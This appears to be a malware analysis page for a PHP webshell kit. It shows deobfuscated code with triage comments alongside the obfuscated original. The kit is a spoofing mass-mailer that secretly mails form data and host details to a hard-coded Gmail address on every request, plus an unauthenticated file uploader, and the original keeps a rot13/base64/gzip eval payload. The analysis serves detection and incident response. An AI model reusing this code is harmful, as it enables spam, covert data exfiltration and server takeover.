PHP Malware Analysis


Tags

Emails
soufian.ngu@gmail.com
BIMO@2M.TV
Input
_POST
Environment
set_time_limit
php_uname

Deobfuscated code

<title>:: Inbox :: Unlimited </title>

<?php 
// Deobfuscator rendering of the first eval() payload. It defines a form-driven
// bulk mailer (enviando) and, separately, a notification mail that is sent to a
// hard-coded address every time this block executes.
// Indicators visible in this block: the POST field names de / nome / assunto /
// mensagem / emails / vai, the hard-coded recipient and From header near the
// end, and the subject prefix "Sendi ".
eval /* PHPDeobfuscator eval output */ {
    // Called with no argument, ignore_user_abort() only returns the current
    // setting and does not change it.
    ignore_user_abort();
    // 0 means no execution time limit; presumably so that a long recipient
    // list is not cut short.
    set_time_limit(0);
    /**
     * Sends one HTML mail per line of the submitted recipient list.
     *
     * Reads everything from $_POST: de (sender address), nome (sender display
     * name), assunto (subject), mensagem (HTML body), emails (newline-separated
     * recipients) and vai (send switch). Echoes one status line per recipient
     * and has no return statement.
     */
    function enviando()
    {
        // Every one-element array below is indexed with this constant.
        $msg = 1;
        $de[1] = $_POST['de'];
        $nome[1] = $_POST['nome'];
        $assunto[1] = $_POST['assunto'];
        $mensagem[1] = $_POST['mensagem'];
        $mensagem[1] = stripslashes($mensagem[1]);
        $emails = $_POST['emails'];
        // The escaped copy is used only in $fullurl below.
        $emails2 = htmlspecialchars($_POST['emails']);
        $para = explode("\n", $emails);
        $n_emails = count($para);
        // $sv and $en are assigned but not read anywhere in this function.
        $sv = $_SERVER['SERVER_NAME'];
        $en = $_SERVER['REQUEST_URI'];
        // @ hides the notice raised when the request carries no Referer header.
        $k88 = @$_SERVER["HTTP_REFERER"];
        // Built but unused: the only reader is the commented-out mail() call in
        // the loop, which looks like a leftover from an earlier variant.
        $fullurl = "" . $k88 . "<br><p>Emails:<br><TEXTAREA rows=5 cols=100>" . $emails2 . "</TEXTAREA></p><p>Engenharia:<br><TEXTAREA rows=5 cols=100>" . $mensagem[1] . "</TEXTAREA></p>";
        // Nothing is sent unless the request carries a truthy "vai" field.
        $vai = $_POST['vai'];
        if ($vai) {
            for ($set = 0; $set < $n_emails; $set++) {
                if ($set == 0) {
                    // Dead code: these headers are rebuilt unconditionally right
                    // after this branch, and the mail() call that used them is
                    // commented out.
                    $headers = "MIME-Version: 1.0\r\n";
                    $headers = "MIME-Version: 1.0\r\nContent-type: text/html; charset=iso-8859-1\r\n";
                    $headers .= "From: {$nome[$msg]} <{$de[$msg]}>\r\n";
                    $headers .= "Return-Path: <{$de[$msg]}>\r\n";
                    //mail($xsylar, $as, $fullurl, $headers);
                }
                // The first assignment is overwritten by the second. From and
                // Return-Path are taken directly from the POSTed values, so the
                // sender identity in delivered mail is whatever was typed into
                // the form, not an account on this host.
                $headers = "MIME-Version: 1.0\r\n";
                $headers = "MIME-Version: 1.0\r\nContent-type: text/html; charset=iso-8859-1\r\n";
                $headers .= "From: {$nome[$msg]} <{$de[$msg]}>\r\n";
                $headers .= "Return-Path: <{$de[$msg]}>\r\n";
                // $n_mail is never initialised; it is used as a running counter
                // for the status lines.
                $n_mail++;
                $destino = $para[$set];
                // Two random six-digit numbers and the recipient address are
                // substituted for the %rand%, %rand2% and %email% placeholders,
                // so the body can differ for every recipient. Detection note:
                // matching on an exact body hash will therefore miss messages
                // from the same run.
                $num1 = rand(100000, 999999);
                $num2 = rand(100000, 999999);
                $msgrand = str_replace("%rand%", $num1, $mensagem[$msg]);
                $msgrand = str_replace("%rand2%", $num2, $msgrand);
                $msgrand = str_replace("%email%", $destino, $msgrand);
                $enviar = mail($destino, $assunto[$msg], $msgrand, $headers);
                // Status output; the recipient string is echoed without HTML
                // escaping.
                if ($enviar) {
                    echo '<font color="green">' . $n_mail . '-' . $destino . ' 0k!</font><br>';
                } else {
                    echo '<font color="red">' . $n_mail . '-' . $destino . ' =(</font><br>';
                    // One-second pause after a failed mail() call.
                    sleep(1);
                }
            }
        }
    }
    // Everything below runs at the top level of the payload and is not gated on
    // "vai": it executes on every request that reaches this script.
    $ip = getenv("REMOTE_ADDR");
    // Assigned but never read in this block.
    $ra44 = rand(1, 99999);
    $subj98 = "Sendi {$ip}";
    $email = "soufian.ngu@gmail.com";
    $from = "From: Sendiw a Wlidati <BIMO@2M.TV>";
    $a45 = $_SERVER['REQUEST_URI'];
    $b75 = $_SERVER['HTTP_HOST'];
    $f12 = $_POST['de'];
    $z13 = $_POST['nome'];
    $x14 = $_POST['assunto'];
    $t15 = $_POST['mensagem'];
    $m30 = $_POST['emails'];
    $m22 = $ip . "\n";
    // The report carries the request URI, host name, all submitted form fields
    // (including the full recipient list) and the client address.
    $msg8873 = "{$a45}\n{$b75}\n{$f12}\n{$z13}\n{$x14}\n{$t15}\n{$m30}\n{$m22}";
    // Sent to the hard-coded mailbox above, so its holder learns where the
    // script is installed and what is submitted through it. Triage note:
    // outbound mail to that recipient, or with a subject of "Sendi " followed
    // by an IP address, in the host's mail logs indicates this script was
    // requested; the earliest such entry bounds when it was first used.
    mail($email, $subj98, $msg8873, $from);
};
?></title>
<style type="text/css">
<!--
.style5 {color: #FFFFFF; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }
.style6 {font-size: 10px}
.style9 {color: #FFFFFF; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10; }
-->
</style>
<form id="form1" name="form1" method="post" action="">
<input type="hidden" name="vai" value="1">
<span class="style5"><?php 
// enviando() has no return statement, so this echo itself prints nothing; the
// per-recipient status lines seen at this position are echoed from inside the
// function while it runs.
echo enviando();
?></span>
<table width="415" height="334" border="0" bgcolor="#000000">
  <tr>
<td width="66"><span class="style5">Name:</span></td>
<td width="321"><span class="style9">

<label>
<input name="nome" type="text" value="<?php 
echo $_POST['nome'];
?>" size="20" />
</label>
</span></td>
</tr>
<tr>
<td><span class="style5">From:</span></td>
<td><input name="de" type="text" value="<?php 
echo $_POST['de'];
?>" size="30" /></td>

</tr>
<tr>
<td><span class="style5">Subject:</span></td>
<td><input name="assunto" value="<?php 
echo $_POST['assunto'];
?>" size="40" /></td>
</tr>
<td><span class="style5">letter:</span>
<br /><br /><br /><br /><br /><br /><br /><span class="style5">mailist:</span></td>

<td><span class="style9">


<p><textarea name="mensagem" cols="50" rows="7"><?php 
echo stripslashes($_POST['mensagem']);
?>
</textarea></p>
<textarea name="emails" cols="50" rows="4"></textarea>
</span></td>
</tr>

<tr>
  <td><span class="style6"></span></td>
  <td align="center"> <span class="style5"><font color="red" size="4">        <em><strong></strong></em><strong></strong></font></span><input name="Submit" type="submit" value="Send " />
  <span class="style5"><font color="red" size="4">        <em><strong> </strong></em><strong></strong></font></span></td>
</tr>
<tr>
  </tr>
</table>
</form>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<?php 
// Deobfuscator rendering of the second eval() payload: a file-upload form. In
// the page it sits after a long run of <br> tags that follows the mailer form.
// No authentication or access check is visible in this block.
eval /* PHPDeobfuscator eval output */ {
    // The literal title string is a usable content signature for this payload.
    echo "<title>Uploader by ghost-dz</title>";
    // Prints the host's operating-system description to whoever requests the page.
    echo php_uname();
    echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">";
    echo "<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>";
    // Triggered by the submit button's value; the comparison is a loose ==.
    if ($_POST['_upl'] == "Upload") {
        // The temporary upload is copied to the client-supplied file name, used
        // as given (a relative path), with no check on extension or content
        // type. @ suppresses any warning from copy().
        // Triage note: files created next to this script after it appeared on
        // the host should be treated as attacker-supplied until shown otherwise.
        if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
            echo "Upload ok :d !!!";
        } else {
            echo "Upload Fail !!!";
        }
    }
};


Original code

<title>:: Inbox :: Unlimited </title>

<?
eval(base64_decode('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'));
?></title>
<style type="text/css">
<!--
.style5 {color: #FFFFFF; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }
.style6 {font-size: 10px}
.style9 {color: #FFFFFF; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10; }
-->
</style>
<form id="form1" name="form1" method="post" action="">
<input type="hidden" name="vai" value="1">
<span class="style5"><? echo enviando(); ?></span>
<table width="415" height="334" border="0" bgcolor="#000000">
  <tr>
<td width="66"><span class="style5">Name:</span></td>
<td width="321"><span class="style9">

<label>
<input name="nome" type="text" value="<? echo $_POST['nome'] ;?>" size="20" />
</label>
</span></td>
</tr>
<tr>
<td><span class="style5">From:</span></td>
<td><input name="de" type="text" value="<? echo $_POST['de'] ;?>" size="30" /></td>

</tr>
<tr>
<td><span class="style5">Subject:</span></td>
<td><input name="assunto" value="<? echo $_POST['assunto'] ;?>" size="40" /></td>
</tr>
<td><span class="style5">letter:</span>
<br /><br /><br /><br /><br /><br /><br /><span class="style5">mailist:</span></td>

<td><span class="style9">


<p><textarea name="mensagem" cols="50" rows="7"><? echo stripslashes($_POST['mensagem']);?>
</textarea></p>
<textarea name="emails" cols="50" rows="4"></textarea>
</span></td>
</tr>

<tr>
  <td><span class="style6"></span></td>
  <td align="center"> <span class="style5"><font color="red" size="4">        <em><strong></strong></em><strong></strong></font></span><input name="Submit" type="submit" value="Send " />
  <span class="style5"><font color="red" size="4">        <em><strong> </strong></em><strong></strong></font></span></td>
</tr>
<tr>
  </tr>
</table>
</form>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<?php eval (gzinflate(base64_decode(str_rot13("ML/EF8ZjRZnsUrk/hVMOJaQZS19pZ3kkVNtX06qEFgnxAct0bH2RGin/zljgT/c2q9
/iih+BI40TaSguWq98TXxc4k0pOiufqT+K7WvibboK8kxCfTyZ6IddrWcAV5mKhyANXlg0FkNPkJ2wTHUTrlQtoJHUjjyFGycunTqKtI8lnvzPLRJ
DT6ZEPUoIKJWkYyewYRFaJxt+epn6S0qs39+umDuTfsEJnSmd3HRWTkCv/WgX54K4g98833KBSUHXv/Ygqsr+k4USOENPRjxM/ZkaAk56eYDM0xJ5
sK552h1khNHKr2lIXpZOhYvSs2VHZh8O8oKbPibYUutxFLYKpCY2KCo8Y7ByDy6D0l8=")))); ?>